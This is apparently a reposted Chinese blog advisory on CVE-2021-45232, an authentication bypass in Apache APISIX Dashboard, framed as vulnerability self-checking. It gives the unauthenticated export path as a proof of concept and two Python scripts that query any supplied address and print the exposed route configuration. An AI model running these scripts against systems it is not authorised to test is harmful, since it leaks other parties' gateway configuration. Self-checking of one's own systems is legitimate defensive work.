cve-2021-45232、Apache APISIX Dashboard身份認證繞過自檢方法-有解無憂

漏洞描述

Apache APISIX 是一個動態、實時、高性能的 API 網關，提供負載均衡、動態上游、灰度發布、服務熔斷、身份認證、可觀測性等豐富的流量管理功能，Apache APISIX Dashboard 使用戶可通過前端界面操作 Apache APISIX，

該漏洞的存在是由于 Manager API 中的錯誤，Manager API 在 gin 框架的基礎上引入了 droplet 框架，所有的 API 和鑒權中間件都是基于 droplet 框架開發的，但是有些 API 直接使用了框架 gin 的介面，從而繞過身份驗證，

**該漏洞危害等級：**高危

CVE 編號 CVE-2021-45232

影響范圍

Apache APISIX Dashboard < 2.10.1

poc:

ip+port/apisix/admin/migrate/export

漏洞自檢方式：

在這里插入圖片描述

自檢腳本示例：

import requests

url=input("輸入測驗地址\n>>>") + "/apisix/admin/migrate/export"
header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "X-Forwarded-For": "127.0.0.1"
        }
try:
    response = requests.get(url, headers=header, verify=False, timeout=10)
    print(response.text)
    if "Routes" in response.text or "hosts" in response.text :
        print(response.text)
        print("[" + url + "]" + "[===存在Apache APISIX Dashboard身份認證繞過漏洞===]")
    else:
        print("[" + url + "]" + "[不存在Apache APISIX Dashboard身份認證繞過漏洞]")
except Exception as e:
    print("[" + url + "]" + "[不存在漏洞]", format(e))

示例2：

import urllib.request
import ssl

url=input("輸入測驗地址\n>>>") + "/apisix/admin/migrate/export"
context = ssl._create_unverified_context()
header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "X-Forwarded-For": "127.0.0.1"
        }
try:
    request = urllib.request.Request(url=url, headers=header)
    response = urllib.request.urlopen(request, context=context, timeout=10)
    html = str(response.read())
    if "Routes" in html or "hosts" in html and response.status == 200:
        print(html)
        print("[" + url + "]" + "[===存在Apache APISIX Dashboard身份認證繞過漏洞===]")
    else:
        print("[" + url + "]" + "[不存在Apache APISIX Dashboard身份認證繞過漏洞]")
except Exception as e:
    print("[" + url + "]" + "[不存在漏洞]", format(e))

宣告：

本網站發布的專案中涉及的任何腳本，僅用于測驗和學習研究，禁止用于商業用途，不能保證其合法性、準確性、完整性及有效性，請根據實際情況自行判斷，
本網站對任何腳本及工具問題概不負責，包括但不限于由任何腳本錯誤導致的任何損失或損害，
間接使用本站中的任何工具及技術，包括但不限于漏洞挖掘或在某些行為違反國家/地區法律?或相關法規的情況下進行傳播，本網站對于由此引起的任何隱私泄漏或其他后果概不負責，

?本網站保留隨時更改或補充此免責宣告的權利，一旦訪問本網站專案，則視為
您已接受此免責宣告，
您在本宣告未發出之時點使用或者訪問了該網站，則規為己接受此宣告，請仔細閱讀，

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/397571.html

標籤：其他

上一篇：阿里云服務器密鑰對登錄實戰操作（簡單實作方式，后續提供linux完全后臺實作）

下一篇：kali軟體更新與更新失敗問題解決